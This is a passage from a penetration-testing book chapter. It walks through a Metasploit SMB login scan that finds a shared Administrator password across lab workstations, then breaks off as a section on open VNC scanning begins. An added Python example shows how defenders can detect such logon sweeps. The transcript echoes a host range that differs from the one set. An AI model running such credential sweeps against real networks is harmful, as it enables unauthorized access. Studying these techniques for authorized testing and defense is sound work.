Chapter 4

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASS_FILE                       no        File containing passwords, one per line
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       Set the SMB service port
   SMBDomain      WORKGROUP        no        SMB Domain
   SMBPass        password         no        SMB Password
   SMBUser        Administrator    no        SMB Username
   THREADS        50               yes       The number of concurrent threads
   USERPASS_FILE                   no        File containing users and passwords separated by space, one pair per line
   USER_FILE                       no        File containing usernames, one per line

msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155
RHOSTS => 192.168.1.170-192.168.1.175
msf auxiliary(smb_login) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(smb_login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_login) > run
[*] Starting host 192.168.1.154
[*] Starting host 192.168.1.150
[*] Starting host 192.168.1.152
[*] Starting host 192.168.1.151
[*] Starting host 192.168.1.153
[*] Starting host 192.168.1.155
[+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 5.1) 'Administrator' : 's3cr3t'
[*] Scanned 4 of 6 hosts (066% complete)
[*] Scanned 5 of 6 hosts (083% complete)
[*] Scanned 6 of 6 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >

You can see a successful login with user Administrator and a password of s3cr3t in the [+] line of the output. Because in many corporate environments workstations are all cloned from one image and deployed throughout the enterprise, the administrator password may well be the same on all of them, granting you access to every workstation on the network.
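Seen from the defender's side, a sweep like the one above leaves network logon events (type 3) for one account, from one source address, on many workstations within seconds. The following detection sketch is an added example, not part of the original text; the event records, hostnames, source addresses, and thresholds are constructed assumptions, and only the Windows event IDs 4624/4625 and logon type 3 are real values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security logon events (4624 = logon success,
# 4625 = logon failure; LogonType 3 = network logon, as produced by SMB).
# Hostnames, addresses and times are made up for this example.
FIELDS = ("time", "host", "id", "type", "user", "src")
RAW = [
    ("2024-05-01T10:00:01", "WS-150", 4625, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T10:00:01", "WS-152", 4625, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T10:00:02", "WS-151", 4625, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T10:00:02", "WS-153", 4624, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T10:00:03", "WS-154", 4625, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T10:00:03", "WS-155", 4624, 3, "Administrator", "192.168.1.50"),
    ("2024-05-01T09:00:00", "WS-150", 4624, 3, "helpdesk", "192.168.1.10"),
    ("2024-05-01T09:40:00", "WS-151", 4624, 3, "helpdesk", "192.168.1.10"),
    ("2024-05-01T10:00:02", "WS-152", 4624, 2, "alice", "-"),
]
EVENTS = [dict(zip(FIELDS, r)) for r in RAW]


def find_login_sweeps(events, window=timedelta(seconds=60), min_hosts=4):
    """Return one finding per (source, account) pair that tries network
    logons on at least min_hosts distinct hosts inside one time window."""
    by_pair = defaultdict(list)
    for e in events:
        if e["id"] in (4624, 4625) and e["type"] == 3:
            key = (e["src"], e["user"].lower())
            by_pair[key].append((datetime.fromisoformat(e["time"]), e["host"], e["id"]))
    findings = []
    for (src, user), rows in sorted(by_pair.items()):
        rows.sort()
        for i, (t0, _, _) in enumerate(rows):
            span = [r for r in rows[i:] if r[0] - t0 <= window]
            if len({h for _, h, _ in span}) >= min_hosts:
                findings.append({
                    "src": src,
                    "user": user,
                    "hosts_tried": sorted({h for _, h, _ in span}),
                    # More than one host here means the same credential is
                    # valid on several machines (shared local admin password).
                    "hosts_succeeded": sorted({h for _, h, e in span if e == 4624}),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_login_sweeps(EVENTS):
        print(f)
```

Giving each workstation its own local administrator password (for example with Windows LAPS) keeps one recovered credential from working on every cloned machine.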

Scanning for Open VNC Authentication

Virtual network computing (VNC) provides graphical access to remote systems in a way that’s similar to Microsoft’s Remote Desktop. VNC installations are common throughout corporations, because they provide a GUI-based view of server and workstation desktops. VNC is frequently installed to meet a temporary need and then completely forgotten and left unpatched, creating